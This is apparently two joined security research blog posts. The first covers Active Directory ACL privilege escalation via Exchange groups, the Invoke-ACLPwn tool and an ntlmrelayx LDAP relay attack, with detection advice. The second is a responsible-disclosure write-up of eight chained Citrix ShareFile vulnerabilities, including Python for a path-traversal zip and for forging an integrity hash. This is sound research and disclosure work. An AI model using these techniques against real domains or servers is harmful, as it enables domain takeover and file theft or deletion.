Escalating privileges with ACLs in Active Directory

Researched and written by Rindert Kramer and Dirk-jan Mollema

Introduction

During internal penetration tests, it happens quite often that we manage to obtain Domain Administrative access within a few hours. Contributing to this are insufficient system hardening and the use of insecure Active Directory defaults. In such scenarios publicly available tools help in finding and exploiting these issues and often result in obtaining domain administrative privileges. This blogpost describes a scenario where our standard attack methods did not work and where we had to dig deeper in order to gain high privileges in the domain. We describe more advanced privilege escalation attacks using Access Control Lists and introduce a new tool called Invoke-Aclpwn and an extension to ntlmrelayx that automate the steps for this advanced attack.

AD, ACLs and ACEs

As organizations become more mature and aware when it comes to cyber security, we have to dig deeper in order to escalate our privileges within an Active Directory (AD) domain. Enumeration is key in these kind of scenarios. Often overlooked are the Access Control Lists (ACL) in AD.An ACL is a set of rules that define which entities have which permissions on a specific AD object. These objects can be user accounts, groups, computer accounts, the domain itself and many more. The ACL can be configured on an individual object such as a user account, but can also be configured on an Organizational Unit (OU), which is like a directory within AD. The main advantage of configuring the ACL on an OU is that when configured correctly, all descendent objects will inherit the ACL.The ACL of the Organizational Unit (OU) wherein the objects reside, contains an Access Control Entry (ACE) that defines the identity and the corresponding permissions that are applied on the OU and/or descending objects.The identity that is specified in the ACE does not necessarily need to be the user account itself; it is a common practice to apply permissions to AD security groups. By adding the user account as a member of this security group, the user account is granted the permissions that are configured within the ACE, because the user is a member of that security group.

Group memberships within AD are applied recursively. Let’s say that we have three groups:

  • Group_A
    • Group_B
      • Group_C

Group_C is a member of Group_B which itself is a member of Group_A. When we add Bob as a member of Group_C, Bob will not only be a member of Group_C, but also be an indirect member of Group_B and Group_A. That means that when access to an object or a resource is granted to Group_A, Bob will also have access to that specific resource. This resource can be an NTFS file share, printer or an AD object, such as a user, computer, group or even the domain itself.
Providing permissions and access rights with AD security groups is a great way for maintaining and managing (access to) IT infrastructure. However, it may also lead to potential security risks when groups are nested too often. As written, a user account will inherit all permissions to resources that are set on the group of which the user is a (direct or indirect) member. If Group_A is granted access to modify the domain object in AD, it is quite trivial to discover that Bob inherited these permissions. However, if the user is a direct member of only 1 group and that group is indirectly a member of 50 other groups, it will take much more effort to discover these inherited permissions.

Escalating privileges in AD with Exchange

During a recent penetration test, we managed to obtain a user account that was a member of the Organization Management security group. This group is created when Exchange is installed and provided access to Exchange-related activities. Besides access to these Exchange settings, it also allows its members to modify the group membership of other Exchange security groups, such as the Exchange Trusted Subsystem security group. This group is a member of the Exchange Windows Permissions security group.

grpMembershp

By default, the Exchange Windows Permissions security group has writeDACL permission on the domain object of the domain where Exchange was installed. 1

domain_permission

The writeDACL permissions allows an identity to modify permissions on the designated object (in other words: modify the ACL) which means that by being a member of the Organization Management group we were able to escalate out privileges to that of a domain administrator.
To exploit this, we added our user account that we obtained earlier to the Exchange Trusted Subsystem group. We logged on again (because security group memberships are only loaded during login) and now we were a member of the Exchange Trusted Subsystem group and the Exchange Windows Permission group, which allowed us to modify the ACL of the domain.

If you have access to modify the ACL of an AD object, you can assign permissions to an identity that allows them to write to a certain attribute, such as the attribute that contains the telephone number. Besides assigning read/write permissions to these kinds of attributes, it is also possible to assign permissions to extended rights. These rights are predefined tasks, such as the right of changing a password, sending email to a mailbox and many more2. It is also possible to add any given account as a replication partner of the domain by applying the following extended rights:

  • Replicating Directory Changes
  • Replicating Directory Changes All

When we set these permissions for our user account, we were able to request the password hash of any user in the domain, including that of the krbtgt account of the domain. More information about this privilege escalation technique can be found on the following GitHub page: https://github.com/gdedrouas/Exchange-AD-Privesc

Obtaining a user account that is a member of the Organization Management group is not something that happens quite often. Nonetheless, this technique can be used on a broader basis. It is possible that the Organization Management group is managed by another group. That group may be managed by another group, et cetera. That means that it is possible that there is a chain throughout the domain that is difficult to discover but, if correlated correctly, might lead to full compromise of the domain.

To help exploit this chain of security risks, Fox-IT wrote two tools. The first tool is written in PowerShell and can be run within or outside an AD environment. The second tool is an extension to the ntlmrelayx tool. This extension allows the attacker to relay identities (user accounts and computer accounts) to Active Directory and modify the ACL of the domain object.

Invoke-ACLPwn

Invoke-ACLPwn is a Powershell script that is designed to run with integrated credentials as well as with specified credentials. The tool works by creating an export with SharpHound3 of all ACLs in the domain as well as the group membership of the user account that the tool is running under. If the user does not already have writeDACL permissions on the domain object, the tool will enumerate all ACEs of the ACL of the domain. Every identity in an ACE has an ACL of its own, which is added to the enumeration queue. If the identity is a group and the group has members, every group member is added to the enumeration queue as well. As you can imagine, this takes some time to enumerate but could end up with a chain to obtain writeDACL permission on the domain object.

help

When the chain has been calculated, the script will then start to exploit every step in the chain:

  • The user is added to the necessary groups
  • Two ACEs are added to the ACL of the domain object:
    • Replicating Directory Changes
    • Replicating Directory Changes All
  • Optionally, Mimkatz’ DCSync feature is invoked and the hash of the given user account is requested. By default the krbtgt account will be used.

After the exploitation is done, the script will remove the group memberships that were added during exploitation as well as the ACEs in the ACL of the domain object.

To test the script, we created 26 security groups. Every group was member of another group (testgroup_a was a member of testgroup_b, which itself was a member of testgroup_c, et cetera, up until testgroup_z.)
The security group testgroup_z had the permission to modify the membership of the Organization Management security group. As written earlier, this group had the permission to modify the group membership of the Exchange Trusted Subsystem security group. Being a member of this group will give you the permission to modify the ACL of the domain object in Active Directory.

We now had a chain of 31 links:

  • Indirect member of 26 security groups
  • Permission to modify the group membership of the Organization Management security group
  • Membership of the Organization Management
  • Permission to modify the group membership of the Exchange Trusted Subsystem security group
  • Membership of the Exchange Trusted Subsystem and the Exchange Windows Permission security groups

The result of the tool can be seen in the following screenshot:

exploit

Please note that in this example we used the ACL configuration that was configured
during the installation of Exchange. However, the tool does not rely on Exchange
or any other product to find and exploit a chain.

Currently, only the writeDACL permission on the domain object is enumerated
and exploited. There are other types of access rights such as owner, writeOwner, genericAll, et cetera, that can be exploited on other object as well.
These access rights are explained in depth in this whitepaper by the BloodHound team.
Updates to the tool that also exploit these privileges will be developed and released in the future.
The Invoke-ACLPwn tool can be downloaded from our GitHub here: https://github.com/fox-it/Invoke-ACLPwn

NTLMRelayx

Last year we wrote about new additions to ntlmrelayx allowing relaying to LDAP, which allows for domain enumeration and escalation to Domain Admin by adding a new user to the Directory. Previously, the LDAP attack in ntlmrelayx would check if the relayed account was a member of the Domain Admins or Enterprise Admins group, and escalate privileges if this was the case. It did this by adding a new user to the Domain and adding this user to the Domain Admins group.
While this works, this does not take into account any special privileges that a relayed user might have. With the research presented in this post, we introduce a new attack method in ntlmrelayx. This attack involves first requesting the ACLs of important Domain objects, which are then parsed from their binary format into structures the tool can understand, after which the permissions of the relayed account are enumerated.
This takes into account all the groups the relayed account is a member of (including recursive group memberships). Once the privileges are enumerated, ntlmrelayx will check if the user has high enough privileges to allow for a privilege escalation of either a new or an existing user.
For this privilege escalation there are two different attacks. The first attack is called the ACL attack in which the ACL on the Domain object is modified and a user under the attackers control is granted Replication-Get-Changes-All privileges on the domain, which allows for using DCSync as desribed in the previous sections. If modifying the domain ACL is not possible, the access to add members to several high privilege groups in the domain is considered for a Group attack:

  • Enterprise Admins
  • Domain Admins
  • Backup Operators (who can back up critical files on the Domain Controller)
  • Account Operators (who have control over almost all groups in the domain)

If an existing user was specified using the --escalate-user flag, this user will be given the Replication privileges if an ACL attack can be performed, and added to a high-privilege group if a Group attack is used. If no existing user is specified, the options to create new users are considered. This can either be in the Users container (the default place for user accounts), or in an OrganizationalUnit for which control was delegated to for example IT department members.

One may have noticed that we mentioned relayed accounts here instead of relayed users. This is because the attack also works against computer accounts that have high privileges. An example for such an account is the computer account of an Exchange server, which is a member of the Exchange Windows Permissions group in the default configuration. If an attacker is in a position to convince the Exchange server to authenticate to the attacker’s machine, for example by using mitm6 for a network level attack, privileges can be instantly escalated to Domain Admin.

Relaying Exchange account

The NTDS.dit hashes can now be dumped by using impacket’s secretsdump.py or with Mimikatz:

secretsdump-2

Similarly if an attacker has Administrative privileges on the Exchange Server, it is possible to escalate privilege in the domain without the need to dump any passwords or machine account hashes from the system.
Connecting to the attacker from the NT Authority\SYSTEM perspective and authenticating with NTLM is sufficient to authenticate to LDAP. The screenshot below shows the PowerShell function Invoke-Webrequest being called with psexec.py, which will run from a SYSTEM perspective. The flag -UseDefaultCredentials will enable automatic authentication with NTLM.

psexec-relay

The 404 error here is expected as ntlmrelayx.py serves a 404 page if the relaying attack is complete

It should be noted that relaying attacks against LDAP are possible in the default configuration of Active Directory, since LDAP signing, which partially mitigates this attack, is disabled by default. Even if LDAP signing is enabled, it is still possible to relay to LDAPS (LDAP over SSL/TLS) since LDAPS is considered a signed channel. The only mitigation for this is enabling channel binding for LDAP in the registry.
To get the new features in ntlmrelayx, simply update to the latest version of impacket from GitHub: https://github.com/CoreSecurity/impacket

Recommendation

As for mitigation, Fox-IT has a few recommendations.

Remove dangerous ACLs
Check for dangerous ACLs with tools such as Bloodhound. 3
Bloodhound can make an export of all ACLs in the domain which helps identifying
dangerous ACLs.

Remove writeDACL permission for Exchange Enterprise Servers
Remove the writeDACL permission for Exchange Enterprise Servers. For more information
see the following technet article: https://technet.microsoft.com/en-us/library/ee428169(v=exchg.80).aspx

Monitor security groups
Monitor (the membership of) security groups that can have a high impact on the domain, such as the Exchange Trusted Subsystem and the Exchange Windows Permissions.

Audit and monitor changes to the ACL.
Audit changes to the ACL of the domain. If not done already, it may be necessary to modify the domain controller policy. More information about this can be found on the following TechNet article: https://blogs.technet.microsoft.com/canitpro/2017/03/29/step-by-step-enabling-advanced-security-audit-policy-via-ds-access/

When the ACL of the domain object is modified, an event will be created with event ID 5136. The Windows event log can be queried with PowerShell, so here is a one-liner to get all events from the Security event log with ID 5136:

Get-WinEvent -FilterHashtable @{logname='security'; id=5136}

This event contains the account name and the ACL in a Security Descriptor Definition Language (SDDL) format.

event

Since this is unreadable for humans, there is a PowerShell cmdlet in Windows 10,
ConvertFrom-SDDL4, which converts the SDDL string into a more readable ACL object.

sddl

If the server runs Windows Server 2016 as operating system, it is also possible to see the original and modified descriptors. For more information: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4715

With this information you should be able to start an investigation to discover what was modified, when that happened and the reason behind that.

References

[1] https://technet.microsoft.com/en-us/library/ee681663.aspx
[2] https://technet.microsoft.com/en-us/library/ff405676.aspx
[3] https://github.com/BloodHoundAD/SharpHound
[4] https://docs.microsoft.com/en-us/powershell/module/Microsoft.powershell.utility/convertfrom-sddlstring

Compromising Citrix ShareFile on-premise via 7 chained vulnerabilities

A while ago we investigated a setup of Citrix ShareFile with an on-premise StorageZone controller. ShareFile is a file sync and sharing solution aimed at enterprises. While there are versions of ShareFile that are fully managed in the cloud, Citrix offers a hybrid version where the data is stored on-premise via StorageZone controllers. This blog describes how Fox-IT identified several vulnerabilities, which together allowed any account to (from the internet) access any file stored within ShareFile. Fox-IT disclosed these vulnerabilities to Citrix, which mitigated them via updates to their cloud platform. The vulnerabilities identified were all present in the StorageZone controller component, and thus cloud-only deployments were not affected. According to Citrix, several fortune-500 enterprises and organisations in the government, tech, healthcare, banking and critical infrastructure sectors use ShareFile (either fully in the Cloud or with an on-premise component).

Sharefile

Gaining initial access

After mapping the application surface and the flows, we decided to investigate the upload flow and the connection between the cloud and on-premise components of ShareFile. There are two main ways to upload files to ShareFile: one based on HTML5 and one based on a Java Applet. In the following examples we are using the Java based uploader. All requests are configured to go through Burp, our go-to tool for assessing web applications.
When an upload is initialized, a request is posted to the ShareFile cloud component, which is hosted at name.sharefile.eu (where name is the name of the company using the solution):

Initialize upload

We can see the request contains information about the upload, among which is the filename, the size (in bytes), the tool used to upload (in this case the Java uploader) and whether we want to unzip the upload (more about that later). The response to this request is as follows:

Initialize upload response

In this response we see two different upload URLs. Both use the URL prefix (which is redacted here) that points to the address of the on-premise StorageZone controller. The cloud component thus generates a URL that is used to upload the files to the on-premise component.

The first URL is the ChunkUri, to which the individual chunks are uploaded. When the filetransfer is complete, the FinishUri is used to finalize the upload on the server. In both URLs we see the parameters that we submitted in the request such as the filename, file size, et cetera. It also contains an uploadid which is used to identify the upload. Lastly we see a h= parameter, followed by a base64 encoded hash. This hash is used to verify that the parameters in the URL have not been modified.

The unzip parameter immediately drew our attention. As visible in the screenshot below, the uploader offers the user the option to automatically extract archives (such as .zip files) when they are uploaded.

Extract feature

A common mistake made when extracting zip files is not correctly validating the path in the zip file. By using a relative path it may be possible to traverse to a different directory than intended by the script. This kind of vulnerability is known as a directory traversal or path traversal.

The following python code creates a special zip file called out.zip, which contains two files, one of which has a relative path.

import sys, zipfile
#the name of the zip file to generate
zf = zipfile.ZipFile('out.zip', 'w')
#the name of the malicious file that will overwrite the origial file (must exist on disk)
fname = 'xxe_oob.xml'
#destination path of the file
zf.write(fname, '../../../../testbestand_fox.tmp')
#random extra file (not required)
#example: dd if=/dev/urandom of=test.file bs=1024 count=600
fname = 'test.file'
zf.write(fname, 'tfile')

When we upload this file to ShareFile, we get the following message:

ERROR: Unhandled exception in upload-threaded-3.aspx - 'Access to the path '\\company.internal\data\testbestand_fox.tmp' is denied.'

This indicates that the StorageZone controller attempted to extract our file to a directory for which we lacked permissions, but that we were able to successfully change the directory to which the file was extracted. This vulnerability can be used to write user controlled files to arbitrary directories, provided the StorageZone controller has privileges to write to those directories. Imagine the default extraction path would be c:\appdata\citrix\sharefile\temp\ and we want to write to c:\appdata\citrix\sharefile\storage\subdirectory\ we can add a file with the name ../storage/subdirectory/filename.txt which will then be written to the target directory. The ../ part indicates that the Operating System should go one directory higher in the directory tree and use the rest of the path from that location.

Vulnerability 1: Path traversal in archive extraction

From arbitrary write to arbitrary read

While the ability to write arbitrary files to locations within the storage directories is a high-risk vulnerability, the impact of this vulnerability depends on how the files on disk are used by the application and if there are sufficient integrity checks on those files. To determine the full impact of being able to write files to the disk we decided to look at the way the StorageZone controller works. There are three main folders in which interesting data is stored:

  • files
  • persistenstorage
  • tokens

The first folder, files, is used to store temporary data related to uploads. Files already uploaded to ShareFile are stored in the persistentstorage directory. Lastly the tokens folder contains data related to tokens which are used to control the downloads of files.

When a new upload was initialized, the URLs contained a parameter called uploadid. As the name already indicates this is the ID assigned to the upload, in this case it is rsu-2351e6ffe2fc462492d0501414479b95. In the files directory, there are folders for each upload matching with this ID.

In each of these folders there is a file called info.txt, which contains information about our upload:

Info.txt

In the info.txt file we see several parameters that we saw previously, such as the uploadid, the file name, the file size (13 bytes), as well as some parameters that are new. At the end, we see a 32 character long uppercase string, which hints at an integrity hash for the data.
We see two other IDs, fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 and fo9252b1-1f49-4024-aec4-6fe0c27ce1e6, which correspond with the file ID for the upload and folder ID to which the file is uploaded respectively.

After trying to figure out for a while what kind of hashing algorithm was used for the integrity check of this file, it turned out that it is a simple md5 hash of the rest of the data in the info.txt file. The twist here is that the data is encoded with UTF-16-LE, which is default for Unicode strings in Windows.

Armed with this knowledge we can write a simple python script which calculates the correct hash over a modified info.txt file and write this back to disk:

import md5
with open('info_modified.txt','r') as infile:
instr = infile.read().strip().split('|')
instr2 = u'|'.join(instr[:-1])
outhash = md5.new(instr2.encode('utf-16-le')).hexdigest().upper()
with open('info_out.txt','w') as outfile:
outfile.write('%s|%s' % (instr2, outhash))

Here we find our second vulnerability: the info.txt file is not verified for integrity using a secret only known by the application, but is only validated with an md5 hash against corruption. This gives an attacker that can write to the storage folders the possibility to alter the upload information.

Vulnerability 2: Integrity of data files (info.txt) not verified

Since our previous vulnerability enabled us to write files to arbitrary locations, we can upload our own info.txt and thus modify the upload information.
It turns out that when uploading data, the file ID fi591ac5-9cd0-4eb7-a5e9-e5e28a7faa90 is used as temporary name for the file. The data that is uploaded is written to this file, and when the upload is finilized this file is added to the users ShareFile account. We are going to attempt another path traversal here. Using the script above, we modify the file ID to a different filename to attempt to extract a test file called secret.txt which we placed in the files directory (one directory above the regular location of the temporary file). The (somewhat redacted) info.txt then becomes:

modified info.txt

When we subsequently post to the upload-threaded-3.aspx page to finalize the upload, we are presented with the following descriptive error:

File size does not match

Apparently, the filesize of the secret.txt file we are trying to extract is 14 bytes instead of 13 as the modified info.txt indicated. We can upload a new info.txt file which does have the correct filesize, and the secret.txt file is succesfully added to our ShareFile account:

File extraction POC

And thus we’ve successfully exploited a second path traversal, which is in the info.txt file.

Vulnerability 3: Path traversal in info.txt data

By now we’ve turned our ability to write arbitrary files to the system into the ability to read arbitrary files, as long as we do know the filename. It should be noted that all the information in the info.txt file can be found by investigating traffic in the web interface, and thus an attacker does not need to have an info.txt file to perform this attack.

Investigating file downloads

So far, we’ve only looked at uploading new files. The downloading of files is also controlled by the ShareFile cloud component, which instructs the StorageZone controller to serve the frequested files. A typical download link looks as follows:

Download URL

Here we see the dt parameter which contains the download token. Additionally there is a h parameter which contains a HMAC of the rest of the URL, to prove to the StorageZone controller that we are authorized to download this file.

The information for the download token is stored in an XML file in the tokens directory. An example file is shown below:

<!--?xml version="1.0" encoding="utf-8"?--><!--?xml version="1.0" encoding="utf-8"?--><?xml version="1.0" encoding="utf-8"?>
<ShareFileDownloadInfo authSignature="866f075b373968fcd2ec057c3a92d4332c8f3060" authTimestamp="636343218053146994">
<DownloadTokenID>dt6bbd1e278a634e1bbde9b94ff8460b24</DownloadTokenID>
<RequestType>single</RequestType>
<BaseUrl>https://redacted.sf-api.eu/</BaseUrl>
<ErrorUrl>https://redacted.sf-api.eu//error.aspx?type=storagecenter-downloadprep</ErrorUrl>
<StorageBasePath>\\s3\sf-eu-1\;</StorageBasePath>
<BatchID>dt6bbd1e278a634e1bbde9b94ff8460b24</BatchID>
<ZipFileName>tfile</ZipFileName>
<UserAgent>Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0</UserAgent>
<Metadata>
<Item key="operatingsystem" value="Linux" />
</Metadata>
<IrmEnabled>false</IrmEnabled>
<IrmPolicyServerUrl />
<IrmAccessId />
<IrmAccessKey />
<Items>
<File name="testfile" path="a4ea881a-a4d5-433a-fa44-41acd5ed5a5f\0f\0f\fi0f0f2e_3477_4647_9cdd_e89758c21c37" size="61" id="" />
</Items>
<Log>
<EventID>fif11465-ba81-8b77-7dd9-4256bc375017</EventID>
<UserID>c7add7af-91ac-4331-b48a-0aeed4a58687</UserID>
<OwnerID>c7add7af-91ac-4331-b48a-0aeed4a58687</OwnerID>
<AccountID>a4ea881a-a4d5-433a-fa44-41acd5ed5a5f</AccountID>
<UserEmailAddress>fox-it@redacted</UserEmailAddress>
<Name>tfile</Name>
<FileCount>1</FileCount>
<AdditionalInfo>fif11465-ba81-8b77-7dd9-4256bc375017</AdditionalInfo>
<FolderID>foh160ab-aa5a-4e43-96fd-e41caed36cea</FolderID>
<ParentID>foh160ab-aa5a-4e43-96fd-e41caed36cea</ParentID>
<Path>/root/a4ea881a-a4d5-433a-fa44-41acd5ed5a5f/foh160ab-aa5a-4e43-96fd-e41caed36cea</Path>
<IncrementDownloadCount>false</IncrementDownloadCount>
<ShareID />
</Log>
</ShareFileDownloadInfo>

Two things are of interest here. The first is the path property of the File element, which specifies which file the token is valid for. The path starts with the ID a4ea881a-a4d5-433a-fa44-41acd5ed5a5f which is the ShareFile AccountID, which is unique per ShareFile instance. Then the second ID fi0f0f2e_3477_4647_9cdd_e89758c21c37 is unique for the file (hence the fi prefix), with two 0f subdirectories for the first characters of the ID (presumably to prevent huge folder listings).

The second noteworthy point is the authSignature property on the ShareFileDownloadInfo element. This suggests that the XML is signed to ensure its authenticity, and to prevent malicious tokens from being downloaded.

At this point we started looking at the StorageZone controller software itself. Since it is a program written in .NET and running under IIS, it is trivial to decompile the binaries with toos such as JustDecompile. While we obtained the StorageZone controller binaries from the server the software was running on, Citrix also offers this component as a download on their website.

In the decompiled code, the functions responsible for verifying the token can quickly be found. The feature to have XML files with a signature is called AuthenticatedXml by Citrix. In the code we find that a static key is used to verify the integrity of the XML file (which is the same for all StorageZone controllers):

Static MAC secret

Vulnerability 4: Token XML files integrity integrity not verified

During our research we of course attempted to simply edit the XML file without changing the signature, and it turned out that it is not nessecary to calculate the signature as an attacker, since the application simply tells you what correct signature is if it doesn’t match:

Signature disclosure

Vulnerability 5: Debug information disclosure

Furthermore, when we looked at the code which calculates the signature, it turned out that the signature is calculated by prepending the secret to the data and calculating a sha1 hash over this. This makes the signature potentially vulnerable to a hash length extension attack, though we did not verify this in the time available.

Hashing of secret prepended

Even though we didn’t use it in the attack chain, it turned out that the XML files were also vulnerable to XML External Entity (XXE) injection:

XXE error

Vulnerability 6 (not used in the chain): Token XML files vulnerable to XXE

In summary, it turns out that the token files offer another avenue to download arbitrary files from ShareFile. Additionally, the integrity of these files is insufficiently verified to protect against attackers. Unlike the previously described method which altered the upload data, this method will also decrypt encrypted files if encrypted storage is enabled within ShareFile.

Getting tokens and files

At this point we are able to write arbitrary files to any directory we want and to download files if the path is known. The file path however consists of random IDs which cannot be guessed in a realistic timeframe. It is thus still necessary for an attacker to find a method to enumerate the files stored in ShareFile and their corresponding IDs.

For this last step, we go back to the unzip functionality. The code responsible for extracting the zip file is (partially) shown below.

Unzip code

What we see here is that the code creates a temporary directory to which it extracts the files from the archive. The uploadId parameter is used here in the name of the temporary directory. Since we do not see any validation taking place of this path, this operation is possibly vulnerable to yet another path traversal. Earlier we saw that the uploadId parameter is submitted in the URL when uploading files, but the URL also contains a HMAC, which makes modifying this parameter seemingly impossible:

HMAC Url

However, let’s have a look at the implementation first. The request initially passes through the ValidateRequest function below:

Validation part 1

Which then passes it to the second validation function:

Validation part 2

What happens here is that the h parameter is extracted from the request, which is then used to verify all parameters in the url before the h parameter. Thus any parameters following the h in the URL are completely unverified!

So what happens when we add another parameter after the HMAC? When we modify the URL as follows:

uploadid-double.png

We get the following message:

{"error":true,"errorMessage":"upload-threaded-2.aspx: ID='rsu-becc299a4b9c421ca024dec2b4de7376,foxtest' Unrecognized Upload ID.","errorCode":605}

So what happens here? Since the uploadid parameter is specified multiple times, IIS concatenates the values which are separated with a comma. Only the first uploadid parameter is verified by the HMAC, since it operates on the query string instead of the individual parameter values, and only verifies the portion of the string before the h parameter. This type of vulnerability is known as HTTP Parameter Polution.

Vulnerability 7: Incorrectly implemented URL verification (parameter pollution)

Looking at the upload logic again, the code calls the function UploadLogic.RecursiveIteratePath after the files are extracted to the temporary directory, which recursively adds all the files it can find to the ShareFile account of the attacker (some code was cut for readability):

Recursive iteration

To exploit this, we need to do the following:

  • Create a directory called rsu-becc299a4b9c421ca024dec2b4de7376, in the files directory.
  • Upload an info.txt file to this directory.
  • Create a temporary directory called ulz-rsu-becc299a4b9c421ca024dec2b4de7376,.
  • Perform an upload with an added uploadid parameter pointing us to the tokens directory.

The creation of directories can be performed with the directory traversal that was initially identified in the unzip operation, since this will create any non-existing directories. To perform the final step and exploit the third path traversal, we post the following URL:

Upload ID path traversal

Side note: we use tokens_backup here because we didn’t want to touch the original tokens directory.

Which returns the following result that indicates success:

Upload ID path traversal result

Going back to our ShareFile account, we now have hundreds of XML files with valid download tokens available, which all link to files stored within ShareFile.

Download tokens

Vulnerability 8: Path traversal in upload ID

We can download these files by modifying the path in our own download token files for which we have the authorized download URL.
The only side effect is that adding files to the attackers account this way also recursively deletes all files and folders in the temporary directory. By traversing the path to the persistentstorage directory it is thus also possible to delete all files stored in the ShareFile instance.

Conclusion

By abusing a chain of correlated vulnerabilities it was possible for an attacker with any account allowing file uploads to access all files stored by the ShareFile on-premise StorageZone controller.

Based on our research that was performed for a client, Fox-IT reported the following vulnerabilities to Citrix on July 4th 2017:

  1. Path traversal in archive extraction
  2. Integrity of data files (info.txt) not verified
  3. Path traversal in info.txt data
  4. Token XML files integrity integrity not verified
  5. Debug information disclosure (authentication signatures, hashes, file size, network paths)
  6. Token XML files vulnerable to XXE
  7. Incorrectly implemented URL verification (parameter pollution)
  8. Path traversal in upload ID

Citrix was quick with following up on the issues and rolling out mitigations by disabling the unzip functionality in the cloud component of ShareFile. While Fox-IT identified several major organisations and enterprises that use ShareFile, it is unknown if they were using the hybrid setup in a vulnerable configuration. Therefor, the number of affected installations and if these issues were abused is unknown.

Disclosure timeline

  • July 4th 2017: Fox-IT reports all vulnerabilities to Citrix
  • July 7th 2017: Citrix confirms they are able to reproduce vulnerability 1
  • July 11th 2017: Citrix confirms they are able to reproduce the majority of the other vulnerabilities
  • July 12th 2017: Citrix deploys an initial mitigation for vulnerability 1, breaking the attack chain. Citrix informs us the remaining findings will be fixed on a later date as defense-in-depth measures
  • October 31st 2017: Citrix deploys additional fixes to the cloud-based ShareFile components
  • April 6th 2018: Disclosure

CVE: To be assigned